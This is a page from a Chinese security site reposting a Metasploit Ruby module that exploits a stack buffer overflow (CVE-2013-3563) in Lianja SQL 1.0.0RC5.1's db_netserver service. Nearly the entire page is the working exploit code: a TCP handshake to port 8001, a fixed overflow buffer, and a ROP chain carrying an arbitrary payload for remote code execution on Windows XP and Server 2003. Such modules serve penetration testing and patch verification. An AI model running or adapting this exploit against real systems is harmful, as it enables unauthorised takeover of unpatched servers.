首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow
来源:metasploit.com 作者:McIntyre 发布时间:2013-06-03  

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::RopDb

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the db_netserver process which
        is spawned by the Lianja SQL server.  The issue is fixed in Lianja SQL 1.0.0RC5.2.
      },
      'Author'         => 'Spencer McIntyre',
      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'CVE', '2013-3563' ]
      ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 20
        },
      'Platform'       => 'win',
      'Arch'           => ARCH_X86,
      'Payload'        =>
        {
          'StackAdjustment' => -3500,
          'Space'           => 500,
          'BadChars'        => "\x01"
        },
      'Targets'        =>
        [
          [ 'Lianja SQL 1.0.0RC5.1 / Windows Server 2003 SP1-SP2', { 'rop_target' => '2003' } ],
          [ 'Lianja SQL 1.0.0RC5.1 / Windows XP SP3', { 'rop_target' => 'xp' } ],
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'May 22 2013'))

    register_options(
      [
        Opt::RPORT(8001),
      ], self.class)
  end

  def check
    begin
      connect
    rescue
      return Exploit::CheckCode::Safe
    end
    sock.put("db_net")
    if sock.recv(4) =~ /\d{1,5}/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect
    sock.put("db_net")
    sock.recv(4)

    print_status("#{rhost}:#{rport} - Sending Malicious Data")
    evil_data =  '000052E1'
    evil_data << 'A'
    evil_data << ('0' * 19991) # this can't be randomized, else a Read Access Violation will occur
    evil_data << generate_rop_payload('msvcrt', payload.encoded, {'target' => target['rop_target']})
    sock.put(evil_data)
    disconnect
  end
end


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zyxel NBG5715 Local admin priv
·ModSecurity Remote Null Pointe
·Intrasrv Simple Web Server 1.0
·BOINC Manager (Seti@home) 7.0.
·Logic Print 2013 - Stack Overf
·YeaLink IP Phone Firmware 9.70
·IBM SPSS SamplePower C1Tab Act
·Hindi Browser 1.2 Denial Of Se
·CodeBlocks 12.11 (Mac OS X) -
·Apache Struts includeParams Re
·HP LaserJet Pro P1606dn Passwo
·Oracle WebCenter Content Check
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved